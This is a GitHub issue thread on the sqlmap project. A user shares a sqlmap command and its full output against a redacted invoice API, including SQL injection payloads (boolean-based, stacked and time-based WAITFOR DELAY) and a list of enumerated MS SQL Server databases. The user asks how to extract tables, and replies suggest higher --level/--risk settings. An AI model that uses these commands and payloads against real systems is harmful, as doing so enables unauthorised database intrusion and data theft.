search

sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org
Other
31.87k stars 5.66k forks source link

Cannot retreive any table information #5546

Closed jvgassel closed 10 months ago

jvgassel commented 10 months ago

Using the command: python sqlmap.py -u https://www.xxxx.nl/api/invoices/invoice.php?GUID=xxx --batch --parse-errors -dbs --time-sec=10 --no-cast -D 1 --tables -t traffic.txt

I get this output

[19:55:20] [INFO] GET parameter 'GUID' appears to be 'Microsoft SQL Server/Sybase stacked queries (comment)' injectable [19:55:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)' [19:55:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF - comment)' [19:55:40] [INFO] GET parameter 'GUID' appears to be 'Microsoft SQL Server/Sybase time-based blind (IF - comment)' injectable [19:55:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [19:55:40] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [19:55:40] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [19:55:41] [INFO] target URL appears to have 49 columns in query injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y [19:57:30] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') [19:57:32] [INFO] checking if the injection point on GET parameter 'GUID' is a false positive GET parameter 'GUID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 463 HTTP(s) requests:

Parameter: GUID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: GUID=xxx' AND 5082=5082 AND 'JxCS'='JxCS

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: GUID=xxx';WAITFOR DELAY '0:0:10'--

Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
Payload: GUID=xxx' WAITFOR DELAY '0:0:10'--

[19:57:32] [INFO] testing Microsoft SQL Server [19:57:32] [INFO] confirming Microsoft SQL Server [19:57:33] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 8.1 or 2012 R2 web application technology: Microsoft IIS 8.5, PHP 7.3.17 back-end DBMS: Microsoft SQL Server 2012 [19:57:33] [INFO] fetching database names [19:57:33] [INFO] fetching number of databases [19:57:33] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [19:57:33] [INFO] retrieved: 10 [19:57:34] [INFO] retrieved: model [19:57:38] [INFO] retrieved: msdb [19:57:41] [INFO] retrieved: 1 [19:57:49] [INFO] retrieved: 2 [19:58:03] [INFO] retrieved: 3 [19:58:22] [INFO] retrieved: 4 [19:58:35] [INFO] retrieved: tempdb [19:58:39] [INFO] retrieved: transferPROD [19:58:49] [INFO] retrieved: transferSTAGING [19:58:59] [INFO] retrieved: [19:58:59] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done) [19:59:03] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

available databases [9]: [] model [] msdb [] 1 [] 2 [] 3 [] 4 [] tempdb [] transferPROD [*] transferSTAGING

[19:59:03] [INFO] fetching tables for database: 1 [19:59:03] [INFO] fetching number of tables for database '1' [19:59:03] [INFO] retrieved: 90 [19:59:05] [INFO] retrieved: [19:59:05] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)

[19:59:08] [INFO] retrieved: [19:59:08] [INFO] retrieved: [19:59:09] [INFO] retrieved: [19:59:09] [INFO] retrieved: [19:59:09] [INFO] retrieved: [19:59:10] [INFO] retrieved: [19:59:10] [INFO] retrieved: [19:59:10] [INFO] retrieved: [19:59:11] [INFO] retrieved: [19:59:11] [INFO] retrieved: [19:59:11] [INFO] retrieved: [19:59:11] [INFO] retrieved: [19:59:12] [INFO] retrieved: [19:59:12] [INFO] retrieved: [19:59:12] [INFO] retrieved: [19:59:12] [INFO] retrieved: [19:59:13] [INFO] retrieved: [19:59:13] [INFO] retrieved: [19:59:13] [INFO] retrieved: [19:59:13] [INFO] retrieved: [19:59:14] [INFO] retrieved: [19:59:14] [INFO] retrieved: [19:59:14] [INFO] retrieved: [19:59:14] [INFO] retrieved: [19:59:15] [INFO] retrieved: [19:59:15] [INFO] retrieved: [19:59:15] [INFO] retrieved: [19:59:16] [INFO] retrieved: [19:59:17] [INFO] retrieved: [19:59:17] [INFO] retrieved: [19:59:17] [INFO] retrieved: [19:59:17] [INFO] retrieved: [19:59:18] [INFO] retrieved: [19:59:18] [INFO] retrieved: [19:59:18] [INFO] retrieved: [19:59:18] [INFO] retrieved: [19:59:19] [INFO] retrieved: [19:59:19] [INFO] retrieved: [19:59:19] [INFO] retrieved: [19:59:19] [INFO] retrieved: [19:59:20] [INFO] retrieved: [19:59:20] [INFO] retrieved: [19:59:20] [INFO] retrieved: [19:59:20] [INFO] retrieved: [19:59:21] [INFO] retrieved: [19:59:21] [INFO] retrieved: [19:59:21] [INFO] retrieved: [19:59:21] [INFO] retrieved: [19:59:21] [INFO] retrieved: [19:59:22] [INFO] retrieved: [19:59:22] [INFO] retrieved: [19:59:22] [INFO] retrieved: [19:59:22] [INFO] retrieved: [19:59:23] [INFO] retrieved: [19:59:23] [INFO] retrieved: [19:59:23] [INFO] retrieved: [19:59:23] [INFO] retrieved: [19:59:24] [INFO] retrieved: [19:59:24] [INFO] retrieved: [19:59:24] [INFO] retrieved: [19:59:24] [INFO] retrieved: [19:59:25] [INFO] retrieved: [19:59:25] [INFO] retrieved: [19:59:25] [INFO] retrieved: [19:59:25] [INFO] retrieved: [19:59:26] [INFO] retrieved: [19:59:26] [INFO] retrieved: [19:59:26] [INFO] retrieved: [19:59:26] [INFO] retrieved: [19:59:27] [INFO] retrieved: [19:59:27] [INFO] retrieved: [19:59:27] [INFO] retrieved: [19:59:28] [INFO] retrieved: [19:59:28] [INFO] retrieved: [19:59:28] [INFO] retrieved: [19:59:29] [INFO] retrieved: [19:59:29] [INFO] retrieved: [19:59:29] [INFO] retrieved: [19:59:29] [INFO] retrieved: [19:59:29] [INFO] retrieved: [19:59:30] [INFO] retrieved: [19:59:30] [INFO] retrieved: [19:59:30] [INFO] retrieved: [19:59:30] [INFO] retrieved: [19:59:31] [INFO] retrieved: [19:59:31] [INFO] retrieved: [19:59:31] [INFO] retrieved: [19:59:31] [INFO] retrieved: [19:59:32] [INFO] retrieved: [19:59:32] [INFO] retrieved: [19:59:32] [INFO] retrieved: [19:59:33] [INFO] retrieved: [19:59:33] [INFO] retrieved: [19:59:33] [INFO] retrieved: [19:59:34] [INFO] retrieved: [19:59:34] [INFO] retrieved: [19:59:34] [INFO] retrieved: [19:59:35] [INFO] retrieved: [19:59:35] [INFO] retrieved: [19:59:35] [INFO] retrieved: [19:59:35] [INFO] retrieved: [19:59:36] [INFO] retrieved: [19:59:36] [INFO] retrieved: [19:59:36] [INFO] retrieved: [19:59:37] [INFO] retrieved: [19:59:37] [INFO] retrieved: [19:59:37] [INFO] retrieved: [19:59:38] [INFO] retrieved: [19:59:38] [INFO] retrieved: [19:59:38] [INFO] retrieved: [19:59:38] [INFO] retrieved: [19:59:39] [INFO] retrieved: [19:59:39] [INFO] retrieved: [19:59:39] [INFO] retrieved: [19:59:39] [INFO] retrieved: [19:59:40] [INFO] retrieved: [19:59:40] [INFO] retrieved: [19:59:40] [INFO] retrieved: [19:59:40] [INFO] retrieved: [19:59:41] [INFO] retrieved: [19:59:41] [INFO] retrieved: [19:59:42] [INFO] retrieved: [19:59:42] [INFO] retrieved: [19:59:42] [INFO] retrieved: [19:59:43] [INFO] retrieved: [19:59:43] [INFO] retrieved: [19:59:43] [INFO] retrieved: [19:59:44] [INFO] retrieved: [19:59:48] [INFO] retrieved: [19:59:48] [INFO] retrieved: [19:59:48] [INFO] retrieved: [19:59:49] [INFO] retrieved: [19:59:49] [INFO] retrieved: [19:59:49] [INFO] retrieved: [19:59:50] [INFO] retrieved: [19:59:50] [INFO] retrieved: [19:59:50] [INFO] retrieved: [19:59:51] [INFO] retrieved: [19:59:51] [INFO] retrieved: [19:59:51] [INFO] retrieved: [19:59:52] [INFO] retrieved: [19:59:52] [INFO] retrieved: [19:59:52] [INFO] retrieved: [19:59:53] [INFO] retrieved: [19:59:53] [INFO] retrieved: [19:59:53] [INFO] retrieved: [19:59:54] [INFO] retrieved: [19:59:54] [INFO] retrieved: [19:59:54] [INFO] retrieved: [19:59:54] [INFO] retrieved: [19:59:55] [INFO] retrieved: [19:59:55] [INFO] retrieved: [19:59:55] [INFO] retrieved: [19:59:55] [INFO] retrieved: [19:59:56] [INFO] retrieved: [19:59:56] [INFO] retrieved: [19:59:56] [INFO] retrieved: [19:59:56] [INFO] retrieved: [19:59:57] [INFO] retrieved: [19:59:57] [INFO] retrieved: [19:59:57] [INFO] retrieved: [19:59:57] [INFO] retrieved: [19:59:57] [INFO] retrieved: [19:59:58] [INFO] retrieved: [19:59:58] [INFO] retrieved: [19:59:58] [INFO] retrieved: [19:59:59] [INFO] retrieved: [19:59:59] [INFO] retrieved: [19:59:59] [INFO] retrieved: [20:00:00] [INFO] retrieved: [20:00:00] [INFO] retrieved: [20:00:00] [INFO] retrieved: [20:00:01] [INFO] retrieved: [20:00:01] [INFO] retrieved: [20:00:01] [INFO] retrieved: [20:00:02] [INFO] retrieved: [20:00:02] [INFO] retrieved: [20:00:02] [INFO] retrieved: Database: 1 [1 table] +------+ | \x02 | +------+

For none of the Databases it can retreive any tables. Sometimes i get [19:54:14] [INFO] resumed: \x02 or [19:54:16] [INFO] resumed: A! or [19:51:43] [INFO] resumed: !

Looking for command parameters to get this working, any help appreciated

ghost3666 commented 10 months ago

python sqlmap.py -u https://www.xxxx.nl/api/invoices/invoice.php?GUID=xxx --batch --parse-errors -dbs --time-sec=10 --no-cast -D 1 --tables -t traffic.txt --level=3 --risk=3

you can use SQLMap's --dbs option to retrieve a list of available databases try this one update sqlmap check privileges check which payload you are using is specific for the job or not

stamparm commented 10 months ago

could be that there are permission issues or those databases. how to properly address this issue with 0 useful information from your side? do a proper debugging and come back later